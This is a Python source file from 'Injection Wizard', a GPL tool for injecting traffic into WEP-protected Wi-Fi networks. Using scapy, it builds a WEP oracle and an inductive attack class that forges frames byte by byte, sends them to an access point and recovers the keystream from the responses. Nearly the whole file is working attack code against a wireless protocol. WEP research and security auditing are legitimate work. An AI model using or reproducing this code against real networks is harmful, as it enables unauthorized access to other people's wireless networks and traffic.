 # -*- coding: UTF-8 -*-
# Injection Wizard
# --An application for injecting traffic in WEP protected Wi-Fi networks--
# Version: 1.0
# Copyright (C) 2010 Fernando Pablo Romero Navarro <fernpromero@gmail.com>
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License
#as published by the Free Software Foundation; either version 2
#of the License, or (at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#

import struct
from array import array
from time import sleep
from scapy.packet import *
from scapy.layers.l2 import *
from scapy.layers.dot11 import *
from sndrcvth import SendReceiveDot11
from actions import add_monitor_header
from session import ServerConf
from filters import *
from scapy.utils import rdpcap



ORACLE_AP=0
ORACLE_STA=1

def array_xor(dst, dstpos, src, srcpos, lng):
    for i in range(lng):
        dst[i+dstpos]=dst[i+dstpos] ^ src[i+srcpos]
        

def copy_WEP_frame(wepdst, wepsrc):
    wepdst.setfieldval('keyid', wepsrc.getfieldval('keyid'))
    wepdst.setfieldval('iv', wepsrc.getfieldval('iv'))
    wepdst.setfieldval('wepdata', wepsrc.getfieldval('wepdata'))
    wepdst.setfieldval('icv', wepsrc.getfieldval('icv'))

class NoResponseException(Exception):
    pass

class NoConnectionException(Exception):
    pass

class DataGuess(object):

    def __init__(self, _values, _index=0):
        self.index=_index
        self.values=_values
        self.nvalues=len(_values)

    def next(self):
        if self.index >= self.nvalues:
            raise StopIteration
        else:
            tmp=self.values[self.index]
            self.index=self.index+1
            return tmp

    def __iter__(self):
        return self

    def reset(self):
        self.index=0



class WEPOracle(object):
    OK=0
    NO_CONNECTION=-2
    NO_RESPONSE=-1

    def __init__(self, srvconf, oracle_type, **moreargs):
        lsf=None
        filters=None
        dstaddr=None
        min_frames=None
        dot11=None
        srcaddr=srvconf.get_if_MAC()
        ifmon=srvconf.get_if_mon()
        l2packet=srvconf.get_monitor_packet()
        bssid=srvconf.get_ap_MAC()
        timeout=srvconf.get_medium_timeout()
        retries=srvconf.get_min_retries()

        
        if oracle_type==ORACLE_AP:
            dstaddr='ff:ff:ff:ff:ff:ff'
            lsf="link[0]=0x08 or link[0]=0xD4"
            min_frames=1
            filters=[lambda x: is_ACK(x, srcaddr),
                     lambda x: is_Data_client_relayed(x, srcaddr)]

        
        self.sendrecv=SendReceiveDot11(ifmon, l2packet, lsf)
        self.sendrecv.set_filters(filters)
        self.sendrecv.set_timeout(timeout)
        self.sendrecv.set_retries(retries)
        self.sendrecv.set_min_wanted_frames(min_frames)

        
        dot11=Dot11()
        dot11.proto=0
        dot11.type='Data'
        dot11.subtype=0
        dot11.FCfield='to-DS+wep'
        dot11.ID=64
        dot11.SC=0xA0
        dot11.addr1=bssid
        dot11.addr2=srcaddr
        dot11.addr3=dstaddr
        dot11.addr4=None

        self.dot11frame=add_monitor_header(srvconf, dot11/Dot11WEP())

    def test_WEP_frame(self, wepframe):
        PAUSE=0.01
        weplayer=self.dot11frame.getlayer(Dot11WEP)
        weplayer.setfieldval('iv', wepframe.getfieldval('iv'))
        weplayer.setfieldval('keyid', wepframe.getfieldval('keyid'))
        weplayer.setfieldval('icv', wepframe.getfieldval('icv'))
        weplayer.setfieldval('wepdata', wepframe.getfieldval('wepdata'))
        num_retries=3
        
        l=self.sendrecv.send(self.dot11frame)
        while(len(l)<1 and num_retries>0):
            sleep(PAUSE)
            l=self.sendrecv.send(self.dot11frame)
            num_retries-=1

        if len(l)>1:
            return self.OK
        elif len(l)<1:
            return self.NO_CONNECTION
        else:
            return self.NO_RESPONSE

    def release(self):
        self.sendrecv.release()


class InductiveAttack(object):
    SLEEP_TIME=0.001
    ICV_LEN=4

    def __init__(self, srvconf, oracle_type, _keyid, _iv, _wepayload, _keystr):
        self.wepayload=array.array("B", _wepayload)
        self.keystr=array.array("B", _keystr)
        self.wepkt=Dot11WEP(iv=_iv, keyid=_keyid)

        lngdata=len(_keystr)-3
        ciphpay=array.array("B", _keystr[:-3])
        array_xor(ciphpay, 0, self.wepayload, 0, lngdata)
        self.wepkt.setfieldval('wepdata', ciphpay.tostring())        
        self.wepkt.setfieldval('icv', crc32(self.wepayload[0:lngdata]))
        self.oracle=WEPOracle(srvconf, oracle_type)
        self.datagen=DataGuess(range(256))

    def release(self):
        self.oracle.release()

    def next(self):
        convspec=lambda x: (x<0 and "i") or "I"
        result=None
        crcval=None
        wepframe=None
        icv=None

        if len(self.keystr)>=len(self.wepayload)+self.ICV_LEN:
            raise StopIteration()

        wepframe=Dot11WEP()
        copy_WEP_frame(wepframe, self.wepkt)

        lngdata=len(self.keystr)-3        
        icv=wepframe.getfieldval('icv')
        fmt="<%1s" % (convspec(icv), )
        icvstr=struct.pack(fmt, icv)
        icvarray=array.array("B", icvstr)
        array_xor(icvarray, 0, self.keystr, lngdata, 3)
        self.datagen.reset()

        for byte in self.datagen:
            icvarray[3]=byte
            crcval=struct.unpack("!I", icvarray.tostring())[0]
            wepframe.setfieldval('icv', crcval)
            
            result=self.oracle.test_WEP_frame(wepframe)

            if result==WEPOracle.OK:
                ksbyte=byte ^ ord(icvstr[3])
                self.keystr.append(ksbyte)
                if lngdata < len(self.wepayload):
                    cphdata=array.array("B", self.wepkt.getfieldval('wepdata'))
                    cphdata.append(self.keystr[lngdata]^self.wepayload[lngdata])
                    self.wepkt.setfieldval('wepdata', cphdata.tostring())
                    crc=crc32(self.wepayload[0:lngdata+1])
                    self.wepkt.setfieldval('icv', crc)

                return ksbyte
            elif result==WEPOracle.NO_CONNECTION:
                raise NoConnectionException()
            elif result==WEPOracle.NO_RESPONSE:
                pass

            sleep(self.SLEEP_TIME)
        
        raise NoResponseException()
